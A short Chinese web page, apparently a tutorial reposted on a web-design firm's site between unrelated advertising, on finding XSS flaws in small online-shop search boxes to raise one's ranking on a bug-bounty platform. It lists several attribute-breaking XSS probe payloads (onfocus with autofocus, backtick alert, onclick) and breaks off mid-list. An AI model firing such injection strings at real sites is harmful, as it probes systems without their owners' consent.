重庆分公司,新征程启航

为企业提供网站建设、域名注册、服务器等服务

如何利用xss漏洞shua盒子rank的

这篇文章给大家介绍如何利用xss漏洞shua盒子rank的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

创新互联专业为企业提供北京网站建设、北京做网站、北京网站设计、北京网站制作等企业网站建设、网页设计与制作、北京企业网站模板建站服务,十多年北京做网站经验,不只是建网站,更提供有价值的思路和整体网络服务。

我们来挖小商城的xss,因为商城的xss输入点多

01

第一步:

搜索框判断:

onfocus=alert1 autofocus            

那两个是反引号,实测可用,在不使用 ‘ ” ( )的情况下,但是一般都要闭合value的 "

“ onfocus=alert('1') autofocus ”

"onclick="alert(1)

">